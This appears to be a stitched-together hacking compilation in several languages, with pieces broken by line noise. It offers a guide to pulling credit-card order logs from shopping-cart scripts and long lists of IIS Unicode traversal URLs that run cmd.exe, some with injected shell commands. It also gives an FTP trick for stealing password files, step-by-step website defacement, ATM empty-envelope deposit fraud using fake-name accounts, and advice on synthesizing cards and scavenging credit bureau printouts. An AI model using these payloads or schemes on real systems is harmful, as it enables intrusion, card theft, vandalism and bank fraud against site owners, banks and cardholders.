Hacking Credit Card
trang này đã được đọc lần
?search=action&keywords=%20&template=order.log
http://www.yahoo.com/
2. search for "/cgi/shopper.cgi?" or for more results try "/cgi-bin/shopper.cgi?" ("shopcart.cgi" can also be used)
3. find a site ("your shopping cart" or "Subtotal $0.00") and remove everything after shopper.cgi
(the url should contain
"/cgi/shopper.cgi?display=action" or
"/cgi-bin/shopper.cgi?display=action" or
possibly "checkout=action")
4. add "?search=action&keywords=%20&template=order.log" to the url and press enter
/cgi-bin/shopper.cgi?search=action&keywords=apollos%2520&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=cgi_bin%20&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=cgi_bin%2520&template=shopper.conf
/cgi-bin/shopper.cgi?search=action&keywords=powerd0wn%20&template=shopper.conf
/cgi-bin/pdg_cart/shopper.conf
/cgi-bin/products/loadpage.cgi?user_id=id&file=/orders.txt
-------------------IRCSHELL UNICODE FOR HACKING----------------
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
/pbserver/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/pbserver/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/test.php3
/cgi-bin/test.php3
/cgi-bin/cgiemail/uargg.txt
/cgi-bin/web2mail.cgi
/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/hosts
/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|
/example.jsp../
/example%2ejsp
/example.jsp..
/index.jsp..
/test.jsp..
/example.jsp%81
/index.JSP
/index.jsp../
/test.jsp../
/index%2ejsp
/test%2ejsp
/index.JHTML
/*.jhtml/
/*.jsp/
/ConsoleHelp/
/*.shtml/
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=
/cgi-bin/maillist.cgi?cmd=list&fldrname=inbox&fldnum=1&order=2&searchkey=&search_fldnum=0&page=99999&html=
/cgi-bin/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0als
/..\..\..\winnt\repair\sam._
:80/../../../autoexec.bat
/......autoexec.bat
/.html/............/autoexec.bat
/../../../../../../../boot.ini
/....../
/..../
/inc/
/include/
/iisadmpwd/
/iissamples/
/scripts/iisadmin/ism.dll%3fhttp/dir
/iisadmin/ism.dll%3fhttp/dir
/cgi-bin/htimage.exe
/_vti_bin/fpcount.exe
/global.asa
/global.asa+.htr
/global.asa\
/default.asp+.htr
/main.asp+.htr
/_vti_bin/shtml.dll/tstt.htm
/_vti_inf.html
/_vti_log/author.log
/_vti_pvt
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_private/form_results.txt
/secret/index.html
/secret/index.htm
/cgi-bin/phf
/cgi-bin/commander.pl
/cgi-bin/Count.cgi
/cgi-bin/test.pl
/cgi-bin/printenv
/cgi-bin/test.cgi
/cgi-bin/test-cgi
/cgi-bin/nph-test-cgi
/cgi-bin/php.cgi
/cgi-bin/handler
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript
/cgi-bin/pfdisplay
/cgi-bin/perl.exe
/cgi-bin/perl
/perl
/scripts/perl.exe
/wwwboard/wwwboard.pl
/cgi-bin/wwwboard.pl
/wwwboard/wwwadmin.pl
/cgi-bin/wwwadmin.pl
/wwwboard/wwwadmin.cgi
/cgi-bin/wwwadmin.cgi
/cgi-bin/jj
/cgi-bin/fi
/cgi-bin/finger
/cgi-bin/finger.cgi?action=archives&cmd=specific&&filename=99.10.28.15.23.username.|/bin/ls|
/cgi-bin/wais.pl
/cgi-bin/edit.pl
/cgi-bin/textcounter.pl
/cgi-bin/info2www
/cgi-bin/cachemgr.cgi
/cgi-bin/wguest.exe
/scripts/wguest.exe
/cgi-bin/test.exe
/scripts/test.exe
/cgi-bin/test.bat
/scripts/test.bat
/cgi-bin/www-sql
/cgi-bin/search.cgi%3fletter=
/cgi-bin/campas
/cgi-bin/view-source
/cgi-bin/webgais
/cgi-bin/aglimpse
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/AnyForm2
/cgi-bin/infogate
/search97/s97_cgi.exe
/search97/search97.vts
/cgi-bin/dumpenv.pl
/session/adminlogin?RCpage=/sysadmin/index.stm
/cgi-bin
/cgi-shl
/scripts
/scripts/bdir.htr
/scripts/convert.bas
/scripts/files.pl
/cgi-bin/files.pl
/domcfg.nsf/%3fopen
/domcfg.nsf/URLRedirect/%3fOpenForm
/domcfg.nsf/viewname%3fSearchView&Query="*"
/log.nsf
/domlog.nsf
/names.nsf
/catalog.nsf
/database.nsf?EditDocument
/names.nsf/Open
/cgi-bin/unlg1.1
/cgi-bin/man.sh
/cgi-bin/AT-admin.cgi
/cgi-bin/filemail.pl
/cgi-bin/mailform.pl
/cgi-bin/mailto.cgi
/cgi-bin/mailform.cgi
/cgi-bin/maillist.pl
/cgi-bin/formto.pl
/cgi-bin/bnbform.cgi
/cgi-bin/bnbform.pl
/cgi-bin/bnbform
/cgi-bin/survey.cgi
/htbin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=|ls|
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/environ.cgi
/cgi-bin/environ.pl
/cgi-dos/args.bat
/cgi-bin/carbo.dll
/cgi-bin/fpexplore.exe
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:\boot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/viewexample.cfm?Tagname=
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/snippets/setlocale.cfm
/cgi-bin/whois_raw.cgi
/cgi-bin/query%3f
:9000/cgi-bin/query%3f
/cgi-bin/admin.cgi
/cgi-bin/ppdscgi.exe
/ppwb/Temp/
/_private/form_results.txt
/_private/register.htm
/_private/register.txt
/_private/registrations.htm
/_private/registrations.txt
/_vti_bin/
/_vti_bin/_vti_adm
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/_vti_aut
/_vti_bin/_vti_aut/author.dll
/_vti_bin/_vti_aut/author.exe
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_vti_inf.html
/_vti_pvt/access.cnf
/_vti_pvt/admin.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/service.cnf
/_vti_pvt/service.pwd
/_vti_pvt/service.stp
/_vti_pvt/services.cnf
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/_vti_pvt/svcacl.cnf
/_vti_pvt/users.pwd
/_vti_pvt/writeto.cnf
/_vti_pwd/administrators.pwd
/~root
/admcgi/contents.htm
/admin.php3
/adminlogin?RCpage=/sysadmin/index.stm
/admisapi/fpadmin.htm
/adsamples/config/site.csc
/AdvWorks/equipment/catalog_type.asp
/Album/
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/aux
/bb-dnbd/bb-hist.sh
/carbo.dll
/catalog.nsf
/cfappman/index.cfm
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/application.cfm1/cfdocs/exampleapp/email/application.cfm
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/examples/mainframeset.cfm
/cfdocs/examples/parks/detail.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expressions.cfm
/cfdocs/root.cfm
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexist.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/gettempdirectory.cfm
/cfdocs/snippets/viewexample.cfm
/cfdocs/zero.cfm
/CFIDE/Administrator/startstop.html
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/cfapps/forums/forums_.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/security/realm_.mdb
/cfusion/database/cfexamples.mdb
/cfusion/database/cfsnippets.mdb
/cfusion/database/cypress.mdb
/cfusion/database/smpolicy.mdb
/cgi-bin/
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/.fhp
/cgi-bin/add_ftp.cgi
/cgi-bin/aglimpse
/cgi-bin/alibaba.pl
/cgi-bin/AnForm2
/cgi-bin/AnyBoard.cgi
/cgi-bin/AnyForm2
/cgi-bin/apexec.pl
/cgi-bin/archie
/cgi-bin/architext_query.cgi
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/ax.cgi
/cgi-bin/ax-admin.cgi
/cgi-bin/axs.cgi
/cgi-bin/bb-hist.sh
/cgi-bin/bigconf.cgi
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bnbform.cgi
/cgi-bin/c_download.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/calendar
/cgi-bin/campas
/cgi-bin/cart.pl
/cgi-bin/cgiback.cgi
/cgi-bin/cgi-lib.pl
/cgi-bin/cgitest.exe
/cgi-bin/cgiwrap
/cgi-bin/classified.cgi
/scripts/cart32.exe
/scripts/cart32.exe/cart32clientlist
/scripts/CGImail.exe
/scripts/convert.bas
/scripts/counter.exe
/scripts/cpshost.dll
/scripts/Fpadmcgi.exe
/scripts/fpcount.exe
/scripts/iisadmin/default.htm
/scripts/iisadmin/ism.dll
/scripts/iisadmin/samples/ctgestb.htx
/scripts/iisadmin/samples/ctgestb.idc
/scripts/iisadmin/samples/details.htx
/scripts/iisadmin/samples/details.idc
/scripts/iisadmin/samples/query.htx
/scripts/iisadmin/samples/query.idc
/scripts/iisadmin/samples/register.htx
/scripts/iisadmin/samples/register.idc
/scripts/iisadmin/samples/sample.htx
/scripts/iisadmin/samples/sample.idc
/scripts/iisadmin/samples/sample2.htx
/scripts/iisadmin/samples/viewbook.htx
/scripts/iisadmin/samples/viewbook.idc
/scripts/iisadmin/tools/ct.htx
/scripts/iisadmin/tools/ctss.idc
/scripts/iisadmin/tools/dsnform.exe
/session/adminlogin?RCpage=/sysadmin/index.stm
/session/admnlogin
--------------------------------THE END-----------------------------
Hacking Shell Melalui Ftp :
Hacking shell melalui FTP
Berikut ini adalah cara menghack menggunakan Windows, yang digunakan untuk mendapatkan password file dari sebuah shell.Cara ini menggunakan ftp protocol.Kebanyakan paswordnya id sembunyikan /shadowed, tapi kamu masih bisa mendapatkannya dg meng-finger atau menebak passwordnya untuk loginnya.
Kamu dapat memulainya dg membuka/memasuki sebuah shell, dan kamu tidak perlu/tidak harus menggunakan/ berada didalam sebuah ftp server.berikut langkah langkahnya :
1.jalankan prompt
2.Tuliskan command untuk membuka dos command prompt
3.tuliskan ftp server.to.hack.com (nama servernya!!)
4.Akan muncul prompt login.. tekan enter saja (tidak perlu menuliskan apa apa)
5.Akan muncul password login.. tekan saja enter...
6.sekarang ketiklah "quote user ftp" dan tekan enter
7.lalu ketik "quote cwd ~root" tekan enter
8.dan ketikan "quote pass ftp" tekan enter
Sekarang kamu sudah memiliki guest access dan dapat mendownload password file.. and have a fuckin' shit with that
9.ketiklah "cd etc" tekan enter.. untuk mendapatkan -etc directory- yg berisi file password
10.ketiklah "get passwd" untuk mendownload passw.file ke HD mu
Sekarang kamu suda memiliki password file dan kamu dapat membukanya di C:\passwd dengan menggunakan notepad
Jika file tersebut di enkripsi.. kamu bisa meng-crackernya.. dan jika tidak dienkripsi.. (You lucky) kamu dapat mencocokan antara user login dg passwordnya....
DEFACE & HACKING SHELL
1.Deface
Langkah 1 : Cari target
Mencari target dapat dilakukan dengan berbagai cara hal ini tergantung kreativitas dan sarana yang dimiliki, dalam hal ini bisa berbentuk script IRC, scanner. Untuk basicnya mengetahui OS yang digunakan server suatu site dapat diketahui dengan menggunakan sitehttp://www.netcraft.com./ juga dapat dilakukan di search engine padahttp://www.yahoo.com/dengan menggunakan words .default.asp
Langkah 2 : Unicode
Setelah target didapat maka digunakan unicode. Unicode itu sendiri penulis juga belum tahu secara mendetail, tapi pada dasarnya unicode menggunakan bahasa ASCII.Server yg menggunakan OS NT dengan IIS sendiri mempunyai bug yang bisa ditembus dengan unicode dalam hal ini bila server itu belum dipatch. Unicode yg berhasil ditemukan untuk memasuki server NT sudah banyak. dan yang bisa dicoba sbb:
http://target-loe/_vti_bin/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+dir+c:\
http://target-loe/scripts/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+dir+c:\
http://target-loe/msdac/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+dir+c:\
http://target-loe/cgi-bin/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+dir+c:\
http://target-loe/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\
bila unicode tsb berhasil maka akan dapat dilihat tampilan seperti berikut:
Directory of c:\
06/03/01 09:59a (DIR) InetPub
08/08/01 06:14p (DIR) WINNT
Langkah 3 :cari file index.htm
Saat membuka browser site tsb pada ie kita melihat tampilan muka site tsb, perlu diperhatikan adalah file tampilan tsb link menuju file apa? biasanya antara lain :index.htm, index.html, default.htm, default.html. Kemudian dengan mengunakan unicode tsb kita mencari file tsb letaknya dimana, biasanya di c:\inetpub\wwwroot (hal ini belum tentu). untuk mencari file dapat digunakan perintah :
/c+dir/s+c:\index.htm
hal ini berarti perintah mencari file index.htm di dalam drive c
untuk mencek apakah file index.htm tsb yg dipergunakan pada tampilan site, dipergunakan perintah :
/c+type+c:\direktory dan nama file, contoh : /c+type+c:\inetpub\wwwroot\index.htm
setelah anda menemukan file index.htm tsb, maka sebaiknya anda copy dulu, hal ini agar tindakan deface kita tidak terlalu merugikan admin server site tsb.sehingga admin tsb mempunyai backup file index.
perintah copy itu sendiri adalah:
/c+copy+c:\
contoh untuk pencopyan adalah :/c+copy+c:\inetpub\wwwroot\index.htm backupindex.htm
untuk mempermudah pekerjaan dapat dilakukan pencopyan file cmd.exe yg berada di direktory c:/winnt/system32 dengan menggunakan nama anda, seperti :
/c+copy+c:\winnt\system32\cmd.exe+c:\deface.exe
hal ini berarti anda mencopy file cmd.exe ke dir c dgn nama deface.exe, sehingga untuk perintah2 selanjutnya tidak memerlukan /winnt/system32/cmd.exe?/ tapi cukup /deface.exe?/
Langkah 4 : echo file index.htm
echo dalam dos berarti anda membuat file maka bila file index.htm yg asli anda echo berarti anda timpa dengan file index anda. untuk perintahnya adalah:
/deface.exe?/c+echo+"deface+was+here"+>+c:\inetpub\wwwroot\index.htm
sehingga tampilan site depan telah terganti dengan tulisan
deface was here
catatan: hal ini berlaku bila file index.htm tsb dapat diecho, krn sebagian server membatasi direktory root dgn read only, sehingga perintah echo index.htm akan menghasilkan :
acces denied
untuk membuat deface anda menjadi lebih bagus, dapat digunakan bahasa html dan ASCII
perintah-perintah lain :
membuat direktory = /c+mkdir+c:\
merubah nama file = /c+ren+c:\file
menghapus file = /c+del+c:\file
--------------------------------THE END--------------------------------
Hacking ATM
Trick 1
Preface:
-------
ATM's are nothing new, banks have been using them for years,
and now you see them being used more than ever, and are becoming
more and more widespread. This, of course, just opens up more
ways to make money, and I am again bringing you another safe and
proven technique of improving your cash flow.
Banks:
-----
As mentioned, almost all banks nowadays have ATM machines.
Grab the local phone book and start calling banks. What you want
to know is "What is the most I can take out of an ATM machine right
after I deposit a check?" Most banks range anywhere from $50 to
$1000. This is for when you make a deposit via the ATM, and then
right away make a withdraw against the funds on the check, even
though the check hasn't been verified. I'm sure you can see what's
coming.
Account:
-------
Open a savings account at the bank that offers the highest
amount of ATM withdraw. Use a fake name (of course) and apply for
the ATM card too. You might even tell them that you need the ATM
card because you work odd hours, so it is difficult for you to get
to the banks when they are open.
Deposit:
-------
Soon you will get your ATM card in the mail, and it should be
sent to your mailing address that would be a lot like a drop for
carding. You should be able to figure out how to do that. Take
your ATM card and go to the banks ATM machine. Select DEPOSIT
and when it asks for amout, type in $999.00. DO NOT deposit an
amount OVER $1000! This is important because then the check will
have to wait for bank clearance, which means that you'll be screwed.
When it's time to insert the deposit into the slot on the ATM, insert
an empty envelope. For all the ATM knows, this was just a check for
$999.00, and now places your account ledger at $999.00. Now you are
free to withdraw up to the full $1000 that you are allowed. Since
you never really put in any money, this is all free money coming out!
I've done this myself and got $950 out of a machine. It was a HUGE
stack of twenties! Just be on the watch for cameras!
Have fun.
Trick 2
Have you ever looked longingly upon the sight of your local PULSE machine
and thought, "There must be some way that I can make some money REAL easy
here."?
Well, there is. But it won't be easy. Protection methods can be overcome,
but the technology involved must be understood IN ITS ENTIRETY before an
[PAUSE] attempt at illegal access is to be made. There are hundreds of pe
ople,
guests of the state, that figured their plans infallible, only to fall
victim to a well-hidden camera.
This article will not be a lesson on HOW to break into the machine, it is
merely a summary of the operations involved with a normal ATM transaction.
This information is being presented on a "for information's sake"-only
basis. I, Count Zero, do not promote nor remotely condone any illegal
acts of any sort. So there.
I. MAGNETIC STRIP FORMAT
This would seem to be the most efficient method of trying to access illegal
sums of cash. You could:
a. steal somebody's card and PIN code
b. synthesize a card
c. attempt to "jackpot" the system
We will only look at option B. As "A" is up to your own devices and "C" has
several good text files written about it already. So "B" it is.
[PAUSE] Let's look at the format of the data written to the magnetic strip
s. This
has been taken from a recent HARTWELL, INC manual.
[ XX XX XX XX XX XX XX XX ] [ YYYY ] [ - 20 CHARS - ] [ ZZ ZZ ZZ ] [ CC CC ]
\-----------------------/ \------/ \--------------/ \----------/ \-------/
Your individual acct. PIN Name of card Bank route CHKSUM
number/serial code Code issuee code/rem.
-gwy 03133-ITT: call reset (c 0,d 85): dte originated
,Q) :
N I Z A T I O N P R E S E N T S
XXXXXXXXXXXXXXXXXXXXXXXX
XX XXXX XXXX XXXX XX
XXX XX XXXXXX XX XXX
XXXX XXXXXXXX XXXX
XXX XX XXXXXX XX XXX
XX XXXX XXXX XXXX XX
XXXXXXXXXXXXXXXXXXXXXXXX
"HOW TO LOGIN TO A C.B.I. SYSTEM"
WRITTEN BY: L.E. PIRATE
THANKS TO: ZANGIN
The following is the login procedure to login to a C.B.I. system,
a few C.B.I. login port numbers, information on the system, and obtain C.B.I.
accounts.
*** HOW TO GET CBI INFORMATION ***
Ok, you can get CBI accounts and CBI printouts at your local mall.
The best places to check are: Insurance Places, Lawyers, Doctors, and Car
Dealerships, and check some places in the mall that might have to check a
person's credit. Trash in their dumpster looking for printouts. Most places
buffer capture their whole call to CBI including the number, everything on
buffer, it's better than christmas. Ok, so look obtain these CBI printouts
and cruise home to the old computer.
-----------------------------------------------
enjoy,